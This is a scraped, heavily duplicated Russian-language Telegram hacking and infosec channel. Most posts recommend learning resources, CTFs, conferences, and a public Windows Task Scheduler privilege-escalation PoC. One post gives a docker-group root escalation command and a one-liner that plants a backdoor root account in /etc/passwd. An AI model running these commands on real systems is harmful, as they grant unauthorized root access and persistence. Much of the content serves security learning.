#hacking #mobileApp
Отличный материал для изучения устройства мобильных приложений и их окружения.
Подробный разбор OWASP Mobile Security Testing Guide с приведением примеров поиска типовых уязвимостей мобильных приложений:
https://sushi2k.gitbooks.io/the-owasp-mobile-security-testing-guide/content/0x05a-Platform-Overview.html
Отличный материал для изучения устройства мобильных приложений и их окружения.
Подробный разбор OWASP Mobile Security Testing Guide с приведением примеров поиска типовых уязвимостей мобильных приложений:
https://sushi2k.gitbooks.io/the-owasp-mobile-security-testing-guide/content/0x05a-Platform-Overview.html
sushi2k.gitbooks.io
Platform Overview · OWASP Mobile Security Testing Guide
#hacking #privilageEscalation
Большой материал по повышению привилегий в скомпрометированных системах и пост эксплуатации: Различные ОС, Инструменты, Техники и пр.
https://rmusser.net/docs/Privilege%20Escalation%20&%20Post-Exploitation.html
Большой материал по повышению привилегий в скомпрометированных системах и пост эксплуатации: Различные ОС, Инструменты, Техники и пр.
https://rmusser.net/docs/Privilege%20Escalation%20&%20Post-Exploitation.html
#hacking #macos
Для пользователей MacOS рекомендую репозиторий пакетного менеджера Homebrew с набором инструментов для пентеста.
https://github.com/sidaf/homebrew-pentest
Easy way:
Для пользователей MacOS рекомендую репозиторий пакетного менеджера Homebrew с набором инструментов для пентеста.
https://github.com/sidaf/homebrew-pentest
Easy way:
brew install sidaf/pentest/recon-ng
GitHub
GitHub - sidaf/homebrew-pentest: Homebrew Tap - Pen Test Tools
Homebrew Tap - Pen Test Tools. Contribute to sidaf/homebrew-pentest development by creating an account on GitHub.
#professional #hacking #windows #exploit
Появился PoC нашумевшей в последнее время уязвимости в Task Scheduler API Windows, который позволяет повышать привилегии любого пользователя (даже гостевого) до SYSTEM.
Пока что PoC очень сырой и работает только на Windows 10 x64. Но судя по простоте эксплуатации данной уязвимости у специалистов не займет много времени для разработки эксплойта к прочим версиям Windows.
Ключевые статьи на эту тему:
На русском:
https://habr.com/post/421577/
На английском с более подробным разбором:
https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f
https://www.bleepingcomputer.com/news/security/exploit-published-for-unpatched-flaw-in-windows-task-scheduler/
Ссылка на репозиторий с PoC:
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
Ссылка на репозиторий с его исходными кодами:
https://github.com/GossiTheDog/zeroday/tree/master/ALPC-TaskSched-LPE
На практике PoC демонстрирует возможность создания процесса с привилегиями SYSTEM, и не дает возможность script-kiddy’сам пулять LPE направо и налево.
Детально:
После запуска PoC’a вы получаете процесс заспавненый от процесса spoolsv.exe, называющийся cmd.exe(с правами SYSTEM), который в свою очередь спавнит connhost.exe и notepad.exe (Описывается как рандомный процесс).
Ожидаемо, что в ближайшее время будет разработан эксплоит для удобного спавнинга желаемых процессов с правами SYSTEM в Windows системах.
Также ожидаемо, что исправление данного бага скорее всего займет несколько недель, т.к. от Microsoft требуется исправить ошибки проверки привилегий в функции SchRpcSetSecurity Task Scheduler’a.
Появился PoC нашумевшей в последнее время уязвимости в Task Scheduler API Windows, который позволяет повышать привилегии любого пользователя (даже гостевого) до SYSTEM.
Пока что PoC очень сырой и работает только на Windows 10 x64. Но судя по простоте эксплуатации данной уязвимости у специалистов не займет много времени для разработки эксплойта к прочим версиям Windows.
Ключевые статьи на эту тему:
На русском:
https://habr.com/post/421577/
На английском с более подробным разбором:
https://doublepulsar.com/task-scheduler-alpc-exploit-high-level-analysis-ff08cda6ad4f
https://www.bleepingcomputer.com/news/security/exploit-published-for-unpatched-flaw-in-windows-task-scheduler/
Ссылка на репозиторий с PoC:
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
Ссылка на репозиторий с его исходными кодами:
https://github.com/GossiTheDog/zeroday/tree/master/ALPC-TaskSched-LPE
На практике PoC демонстрирует возможность создания процесса с привилегиями SYSTEM, и не дает возможность script-kiddy’сам пулять LPE направо и налево.
Детально:
После запуска PoC’a вы получаете процесс заспавненый от процесса spoolsv.exe, называющийся cmd.exe(с правами SYSTEM), который в свою очередь спавнит connhost.exe и notepad.exe (Описывается как рандомный процесс).
Ожидаемо, что в ближайшее время будет разработан эксплоит для удобного спавнинга желаемых процессов с правами SYSTEM в Windows системах.
Также ожидаемо, что исправление данного бага скорее всего займет несколько недель, т.к. от Microsoft требуется исправить ошибки проверки привилегий в функции SchRpcSetSecurity Task Scheduler’a.
Хабр
Опубликован эксплоит для незакрытой уязвимости в планировщике задач Windows (перевод)
Одним из исследователей безопасности была опубликована в Twitter информация об уязвимости в ОС Windows. Уязвимость заключается в эскалации привилегий на локал...
#hacking #mobileApp #professional
Отличный репозиторий с Cheat Sheet’ом для анализа защищенности мобильных приложений.
Описано много техник по перехвату трафика, обходу SSL Pinning’a и пр.
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/blob/master/README.md
Отличный репозиторий с Cheat Sheet’ом для анализа защищенности мобильных приложений.
Описано много техник по перехвату трафика, обходу SSL Pinning’a и пр.
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/blob/master/README.md
GitHub
MobileApp-Pentest-Cheatsheet/README.md at master · tanprathan/MobileApp-Pentest-Cheatsheet
The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - tanprathan/MobileApp-Pentest-Chea...
#hacking #knowledge #tg
По просьбам трудящихся, публикую каналы и чаты связанные с хаккингом, ИБ и пр., на которые сам подписан.
P.S. краткие описания приведены для тех, кто только начинает разбираться и ищет источники информации.
Каналы:
https://xn--r1a.website/antichat - легендарный форум Antichat перешел в Tg.
https://xn--r1a.website/hacker_frei - все статьи с журналов Xakep, ITЭксперт и пр. в открытом виде.
https://xn--r1a.website/bykvaadm - канал одного изветного админа. Крутые подсказки, лекции и знания о Linux, Docker, Ansible и пр. технологиях
https://xn--r1a.website/HNews - новостной агрегатор актуальных новостей и событий в ИБ
https://xn--r1a.website/xakep_ru - официальный канал журнала Хакер
https://xn--r1a.website/FullDisclosure - канал с информацией о появляющихся уязвимосятх и эксплойтах
https://xn--r1a.website/bug_bounty_channel - канал с опубликованным багами с HackerOne, обнаруженными в ходе BugBounty
https://xn--r1a.website/anti_malware - новостной агрегатор событий из мира информационной безопасности
https://xn--r1a.website/infosecmemes - самое важное в нашем деле - это мемы
https://xn--r1a.website/cyberpunkyc - один известный хаккер со своим мнением
https://xn--r1a.website/R0_Crew - канал группы R0 Crew, известной своими зубодробительными навыками реверс-инжиниринга
https://xn--r1a.website/webpwn - канал известного хакера из сферы Application Security
https://xn--r1a.website/br0wsec - еще один канал об AppSec и безопасности Client-Side части
https://xn--r1a.website/cybershit - канал с актуальщиной в мире ИБ
https://xn--r1a.website/github_repos - интересные репозитории со всего мира
Чаты:
https://xn--r1a.website/DC7499 - крупнейший чат в Российском комьюнити о ИБ и всем, что с ней связано
https://xn--r1a.website/spbctf - тусовка питерского ВУЗа ИТМО. Ребята активно играют в CTF и готовы всегда ответить на все связанные вопросы.
https://xn--r1a.website/DCG7812 - тусовка DefCon Russia 7812, отличная атмосфера, содержит множество крутейших экспертов своего дела.
https://xn--r1a.website/defcon_nn - чат группы DefCon NN (Нижний Новгород), талантливые ребята пишут свои квесты, разбираются в технологиях и всегда рады гостям
Боты:
@GetSploitBot - Бот аналог известного инструмента для поиска опубликованных уязвимостей - searchsploit
По просьбам трудящихся, публикую каналы и чаты связанные с хаккингом, ИБ и пр., на которые сам подписан.
P.S. краткие описания приведены для тех, кто только начинает разбираться и ищет источники информации.
Каналы:
https://xn--r1a.website/antichat - легендарный форум Antichat перешел в Tg.
https://xn--r1a.website/hacker_frei - все статьи с журналов Xakep, ITЭксперт и пр. в открытом виде.
https://xn--r1a.website/bykvaadm - канал одного изветного админа. Крутые подсказки, лекции и знания о Linux, Docker, Ansible и пр. технологиях
https://xn--r1a.website/HNews - новостной агрегатор актуальных новостей и событий в ИБ
https://xn--r1a.website/xakep_ru - официальный канал журнала Хакер
https://xn--r1a.website/FullDisclosure - канал с информацией о появляющихся уязвимосятх и эксплойтах
https://xn--r1a.website/bug_bounty_channel - канал с опубликованным багами с HackerOne, обнаруженными в ходе BugBounty
https://xn--r1a.website/anti_malware - новостной агрегатор событий из мира информационной безопасности
https://xn--r1a.website/infosecmemes - самое важное в нашем деле - это мемы
https://xn--r1a.website/cyberpunkyc - один известный хаккер со своим мнением
https://xn--r1a.website/R0_Crew - канал группы R0 Crew, известной своими зубодробительными навыками реверс-инжиниринга
https://xn--r1a.website/webpwn - канал известного хакера из сферы Application Security
https://xn--r1a.website/br0wsec - еще один канал об AppSec и безопасности Client-Side части
https://xn--r1a.website/cybershit - канал с актуальщиной в мире ИБ
https://xn--r1a.website/github_repos - интересные репозитории со всего мира
Чаты:
https://xn--r1a.website/DC7499 - крупнейший чат в Российском комьюнити о ИБ и всем, что с ней связано
https://xn--r1a.website/spbctf - тусовка питерского ВУЗа ИТМО. Ребята активно играют в CTF и готовы всегда ответить на все связанные вопросы.
https://xn--r1a.website/DCG7812 - тусовка DefCon Russia 7812, отличная атмосфера, содержит множество крутейших экспертов своего дела.
https://xn--r1a.website/defcon_nn - чат группы DefCon NN (Нижний Новгород), талантливые ребята пишут свои квесты, разбираются в технологиях и всегда рады гостям
Боты:
@GetSploitBot - Бот аналог известного инструмента для поиска опубликованных уязвимостей - searchsploit
Telegram
ANTICHAT Channel
Официальный канал https://forum.antichat.club
#professional #hacking #LPE
Повышение привилегий до root-пользователя при наличии прав на управление докером в ОС (Доступ к группе ‘docker’)
Если на скомпрометированной машине команда
Следующий шаг, добавить бэкдор командой (Учетные данные: toor/password):
https://twitter.com/4lex/status/1035932897407115264
Повышение привилегий до root-пользователя при наличии прав на управление докером в ОС (Доступ к группе ‘docker’)
Если на скомпрометированной машине команда
id показывает, что текущий пользователь принадлежит группе docker, значит существует возможность получить доступ к ОС от имени пользователя root командой:$ docker run -it --rm -v /:/mnt bashСледующий шаг, добавить бэкдор командой (Учетные данные: toor/password):
# echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
Ссылка на оригинал:https://twitter.com/4lex/status/1035932897407115264
Twitter
[audible]blink
You land on a computer and `id` shows you're part of the `docker` group. Escalate to root with: $> docker run -it --rm -v $PWD:/mnt bash adds backdoor toor:password #> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
#hacking #web #professional
Интересное видео с конференции BlackHat2018 о том, как превращать данные кэша в эксплоиты.
Известные и некоторые новые подходы к атакам Web Cache Deception.
https://www.youtube.com/watch?v=j2RrmNxJZ5c&app=desktop
Интересное видео с конференции BlackHat2018 о том, как превращать данные кэша в эксплоиты.
Известные и некоторые новые подходы к атакам Web Cache Deception.
https://www.youtube.com/watch?v=j2RrmNxJZ5c&app=desktop
YouTube
Practical Web Cache Poisoning: Redefining 'Unexploitable'
Modern web applications are composed from a crude patchwork of caches and content delivery networks. In this session I'll show you how to compromise websites by using esoteric web features to turn their caches into exploit delivery systems, targeting everyone…
#hacking #ctf #beginners
Ребята из spbCTF открывают новый сезон обучения. В этом сезоне речь пойдет о Attack/Defence CTF соревнованиях.
Вводный стрим по ссылке: https://www.youtube.com/watch?v=ELMRyKkHFXU
В описании к видео ссылка на регистрацию и на прочие подробности.
Всем, кому интересно развиваться в направлении CTF соревнований, очень рекомендую.
Ребята из spbCTF открывают новый сезон обучения. В этом сезоне речь пойдет о Attack/Defence CTF соревнованиях.
Вводный стрим по ссылке: https://www.youtube.com/watch?v=ELMRyKkHFXU
В описании к видео ссылка на регистрацию и на прочие подробности.
Всем, кому интересно развиваться в направлении CTF соревнований, очень рекомендую.
YouTube
Attack-Defense — приветственный стрим
Мы рассказали, как устроены CTF в формате атак-дефенса, и что будет на встречах SPbCTF в этом сезоне.
Регистрация на атак-дефенс: https://vk.cc/8sMEwH
Пост со ссылками и основными мыслями из стрима — в группе:
http://vk.com/wall-114366489_1420
Регистрация на атак-дефенс: https://vk.cc/8sMEwH
Пост со ссылками и основными мыслями из стрима — в группе:
http://vk.com/wall-114366489_1420
#research #books
Много кому из новичков, а также уже сформировавшимся профессионалам, будет интересно почитать ежегодное издание PositiveResearch от компании Positive Technologies, которое рассказывает о произошедшем в сфере информационной безопасности за год. Здесь и атаки на коммерческие структуры, разборы новых уязвимостей, статистика и прочее, прочее.
Рекомендую ознакомиться:
https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/Positive-Research-2018-rus.pdf
Много кому из новичков, а также уже сформировавшимся профессионалам, будет интересно почитать ежегодное издание PositiveResearch от компании Positive Technologies, которое рассказывает о произошедшем в сфере информационной безопасности за год. Здесь и атаки на коммерческие структуры, разборы новых уязвимостей, статистика и прочее, прочее.
Рекомендую ознакомиться:
https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/Positive-Research-2018-rus.pdf
#hacking #professional #lpe
Полезный набор техник по закреплению, пост-эксплуатации, повышению привилегий в различных системах:
https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/
Полезный набор техник по закреплению, пост-эксплуатации, повышению привилегий в различных системах:
https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/
#hacking #research #clientSide
Новая техника удержания жертвы на странице с рекламой, CSRF и прочим.
Смещаем курсор мыши с помощью CSS стиля, и жертва не может выйти со страницы из-за того, что попросту кликает не туда.
https://xakep.ru/2018/09/17/evil-cursor/
Новая техника удержания жертвы на странице с рекламой, CSRF и прочим.
Смещаем курсор мыши с помощью CSS стиля, и жертва не может выйти со страницы из-за того, что попросту кликает не туда.
https://xakep.ru/2018/09/17/evil-cursor/
«Хакер»
Мошенники из группировки Partnerstroka блокируют курсор пользователей Google Chrome
Исследователи Malwarebytes рассказали о мошеннической группе Partnerstroka, которая блокирует пользователей Google Chrome на сайтах фальшивой технической поддержки при помощи новой техники «злой курсор» (evil cursor).
#informationSecurity #cources #beginers
Инфосистемы JET открывает серию вебинаров по информационной безопасности для начинающих специалистов.
Скорее всего предвидеться много воды, но для ознакомления с терминологией и трендами рекомендую новичкам.
https://habr.com/company/jetinfosystems/blog/423477/
Ссылки на все вебинары:
1. Вебинар «Основные термины ИБ», 4 октября с 16.00 до 18.00.
2. Вебинар «Стандарты ИБ», 9 октября с 16.00 до 18.00.
3. Вебинар «Требования ИБ», 11 октября с 16.00 до 18.00.
4. Вебинар «Технологии ИБ», 16 октября с 16.00 до 18.00.
5. Вебинар «Тренды ИБ», 18 октября с 16.00 до 18.00.
Инфосистемы JET открывает серию вебинаров по информационной безопасности для начинающих специалистов.
Скорее всего предвидеться много воды, но для ознакомления с терминологией и трендами рекомендую новичкам.
https://habr.com/company/jetinfosystems/blog/423477/
Ссылки на все вебинары:
1. Вебинар «Основные термины ИБ», 4 октября с 16.00 до 18.00.
2. Вебинар «Стандарты ИБ», 9 октября с 16.00 до 18.00.
3. Вебинар «Требования ИБ», 11 октября с 16.00 до 18.00.
4. Вебинар «Технологии ИБ», 16 октября с 16.00 до 18.00.
5. Вебинар «Тренды ИБ», 18 октября с 16.00 до 18.00.
Хабр
Be a security ninja: начни свой путь к вершинам ИБ
Информационная безопасность – одна из дисциплин, набирающих бешеную популярность в последние годы. Между тем, многих пугает порог вхождения, разрозненность зн...
#beginners #video #ctf
Широкоизвестный обладатель канала LiveOverflow (о хакинге, CTF’ах и пр. связанным с ИБ) рассказывает о своем первом опыте игры в Attack/Defense CTF на Defcon Las Vegas 2018.
Интересно посмотреть даже тем, кто уже знаком с данным мероприятием.
https://www.youtube.com/watch?v=RXgp4cDbiq4
Широкоизвестный обладатель канала LiveOverflow (о хакинге, CTF’ах и пр. связанным с ИБ) рассказывает о своем первом опыте игры в Attack/Defense CTF на Defcon Las Vegas 2018.
Интересно посмотреть даже тем, кто уже знаком с данным мероприятием.
https://www.youtube.com/watch?v=RXgp4cDbiq4
YouTube
DEF CON CTF 2018 Finals
Vlog about the Attack and Defense DEF CON 2018 CTF Finals in Las Vegas.
learn hacking (ad): https://hextree.io
-=[ ❤️ Support ]=-
→ per Video: https://www.patreon.com/join/liveoverflow
→ per Month: https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/join…
learn hacking (ad): https://hextree.io
-=[ ❤️ Support ]=-
→ per Video: https://www.patreon.com/join/liveoverflow
→ per Month: https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/join…
#events
15-16 ноября будет конференция OFFZONE в Москве (Digital October). Продажа билетов уже стартовала. Ценник - 5000 рублей. Официальный сайт - offzone.moscow. Репост анонса в другие чаты приветствуется)
Больше подробностей про формат конференции можно почитать в анонсе на хакере - xakep.ru/2018/09/03/offzone-2018/
К тому же у нас до сих пор открыт CFP, так что если есть желание что-нибудь зачитать - велкам) Дедлайн 5 откября. Форму подачи доклада можно найти на сайте.
15-16 ноября будет конференция OFFZONE в Москве (Digital October). Продажа билетов уже стартовала. Ценник - 5000 рублей. Официальный сайт - offzone.moscow. Репост анонса в другие чаты приветствуется)
Больше подробностей про формат конференции можно почитать в анонсе на хакере - xakep.ru/2018/09/03/offzone-2018/
К тому же у нас до сих пор открыт CFP, так что если есть желание что-нибудь зачитать - велкам) Дедлайн 5 откября. Форму подачи доклада можно найти на сайте.
«Хакер»
OFFZONE 2018: никаких пиджаков, никакого бизнеса — только hardcore research
15-16 ноября 2018 года в Москве состоится международная конференция по кибербезопасности OFFZONE 2018. Мероприятие пройдет в центре Digital October и объединит на своей площадке экспертов, исследователей, участников профессионального сообщества и всех неравнодушных…
#hacking #beginners #professional #sqlInjection
Полезная WIKI по SQL-Инъекциям. Разобраны все аспекты эксплуатации инъекций с примерами для MYSQL, Oracle, SQL-Server.
https://sqlwiki.netspi.com/
Полезная WIKI по SQL-Инъекциям. Разобраны все аспекты эксплуатации инъекций с примерами для MYSQL, Oracle, SQL-Server.
https://sqlwiki.netspi.com/
Netspi
NetSPI SQL Injection Wiki
A one stop resource for fully identifying, exploiting, and escalating SQL injection vulnerabilities across various Database Management Systems.
#hacking #web
Portswigger (Разработчики продукта BurpSuite) объявили номинацию «Top 10 Web Hacking Techniques of 2017».
В качестве кандидатов на странице представлены более 30 крутейших историй взлома компаний через веб-приложения.
Голосование уже завершено, но с историями все еще можно ознакомиться. В ближайшее время ждем результатов номинации.
https://portswigger.net/blog/top-10-web-hacking-techniques-of-2017-voting-open
Portswigger (Разработчики продукта BurpSuite) объявили номинацию «Top 10 Web Hacking Techniques of 2017».
В качестве кандидатов на странице представлены более 30 крутейших историй взлома компаний через веб-приложения.
Голосование уже завершено, но с историями все еще можно ознакомиться. В ближайшее время ждем результатов номинации.
https://portswigger.net/blog/top-10-web-hacking-techniques-of-2017-voting-open
PortSwigger Research
Top 10 Web Hacking Techniques of 2017 - Voting Open
The nominations are in for the Top 10 Web Hacking Techniques of 2017, so it's time to start the community vote. We're inviting everyone to select their personal top 10, and the votes will be used to b
#ctf #quest
Рекомендую новичками интересный квест от группы Defcon-NN. Когда-то сам успел в него поиграть и взять первое место на PhDays в прохождении этого квеста. Сейчас ребята его доработали и запускают заново. Сложность задач ниже среднего, очень полезно для изучения азов хакинга, т.к. столкнетесь с разными ситуациями и инструментами.
Рекомендую новичками интересный квест от группы Defcon-NN. Когда-то сам успел в него поиграть и взять первое место на PhDays в прохождении этого квеста. Сейчас ребята его доработали и запускают заново. Сложность задач ниже среднего, очень полезно для изучения азов хакинга, т.к. столкнетесь с разными ситуациями и инструментами.
Forwarded from Wire Snark
DefHack 2018.9: Виноградный Джо
или Как сисадмин Виноград оказался не таким уж неуловимым.
Приглашаем принять участие в первом дополнении нашего хакерского квеста DefHack на конференции NeoQUEST-2018! Онлайн-доступ будет открыт с завтрашнего утра, 26 сентября. Подробнее по ссылке http://defcon-nn.ru/defhack.
В квесте представлен виртуальный мир анти-утопии, по которому вам предстоит путешествовать, выполняя различные задания. Всё начинается с поступления на работу в отдел расследования инцидентов Ё-корп. Распутывание дел в роли "белого" хакера приведет вас к встрече с интересными противниками — вы познакомитесь с яркими представителями группировок в "серых" и "чёрных" шляпах. Каждый ваш шаг сказывается на окружающем мире, отражаясь через призму новостного сайта корпорации. По мере того, как вы узнаете стороны конфликта получше, вам, как и в жизни, представится возможность выбора. От того, чью сторону вы примете, зависит судьба этого мира.
Категории заданий, включенные в версию DefHack 2018.9:
- форензика, расследования (сеть, диск)
- веб
- разведка, osint
- mitm
- brute-force
- pwn
- повышение привилегий
- смарт-контракты Этериум
Кроме того, вам представится возможность поработать с сетью Tor, причем не только через браузер, но также потребуется перенаправлять в неё трафик приложений (например, с помощью torsocks). Мы рекомендуем использовать какой-либо дистрибутив Linux.
Участвовать можно как в одиночку, так и в команде. Сложность большинства заданий — легкая или средняя, они вполне по силам любому админу, программисту, тестировщику, и тем более пентестеру. По каждому заданию можно получить внутриигровую подсказку, привязанную к контексту вашего текущего прогресса. Для вопросов к организаторам есть выделенный телеграм-чат @defhack2018_neoquest.
Составляя задания, мы старались приблизить их к реалистичным, потенциально возможным ситуациям. Большинство заданий, надеемся, полезны и для отработки базовых методов атаки, и понимания возможных методов защиты.
или Как сисадмин Виноград оказался не таким уж неуловимым.
Приглашаем принять участие в первом дополнении нашего хакерского квеста DefHack на конференции NeoQUEST-2018! Онлайн-доступ будет открыт с завтрашнего утра, 26 сентября. Подробнее по ссылке http://defcon-nn.ru/defhack.
В квесте представлен виртуальный мир анти-утопии, по которому вам предстоит путешествовать, выполняя различные задания. Всё начинается с поступления на работу в отдел расследования инцидентов Ё-корп. Распутывание дел в роли "белого" хакера приведет вас к встрече с интересными противниками — вы познакомитесь с яркими представителями группировок в "серых" и "чёрных" шляпах. Каждый ваш шаг сказывается на окружающем мире, отражаясь через призму новостного сайта корпорации. По мере того, как вы узнаете стороны конфликта получше, вам, как и в жизни, представится возможность выбора. От того, чью сторону вы примете, зависит судьба этого мира.
Категории заданий, включенные в версию DefHack 2018.9:
- форензика, расследования (сеть, диск)
- веб
- разведка, osint
- mitm
- brute-force
- pwn
- повышение привилегий
- смарт-контракты Этериум
Кроме того, вам представится возможность поработать с сетью Tor, причем не только через браузер, но также потребуется перенаправлять в неё трафик приложений (например, с помощью torsocks). Мы рекомендуем использовать какой-либо дистрибутив Linux.
Участвовать можно как в одиночку, так и в команде. Сложность большинства заданий — легкая или средняя, они вполне по силам любому админу, программисту, тестировщику, и тем более пентестеру. По каждому заданию можно получить внутриигровую подсказку, привязанную к контексту вашего текущего прогресса. Для вопросов к организаторам есть выделенный телеграм-чат @defhack2018_neoquest.
Составляя задания, мы старались приблизить их к реалистичным, потенциально возможным ситуациям. Большинство заданий, надеемся, полезны и для отработки базовых методов атаки, и понимания возможных методов защиты.
#CTF #beginners #hacking
Появилась интересная бета-версия площадки https://attackdefense.com/. Площадка дает задачи по разным направлениям по типу задач CTF. Уровень задач easy-medium (Основываясь на первом взгляде). Рекомендую новичкам, кому хочется изучать не в глубь, а в ширь.
Появилась интересная бета-версия площадки https://attackdefense.com/. Площадка дает задачи по разным направлениям по типу задач CTF. Уровень задач easy-medium (Основываясь на первом взгляде). Рекомендую новичкам, кому хочется изучать не в глубь, а в ширь.
#beginners #professional #reverseEngineering
https://godbolt.org/ очень полезный сайт для изучения языка ассемблера. Интерактивный интерфейс переводит конструкции высокоуровневого языка в ассемблерные конструкции, что очень наглядно демонстрирует то, как происходит компиляция.
Будет полезно начинающим реверс иженерам и прочим специалистам.
https://godbolt.org/ очень полезный сайт для изучения языка ассемблера. Интерактивный интерфейс переводит конструкции высокоуровневого языка в ассемблерные конструкции, что очень наглядно демонстрирует то, как происходит компиляция.
Будет полезно начинающим реверс иженерам и прочим специалистам.
godbolt.org
Compiler Explorer
Compiler Explorer is an interactive online compiler which shows the assembly output of compiled C++, Rust, Go (and many more) code.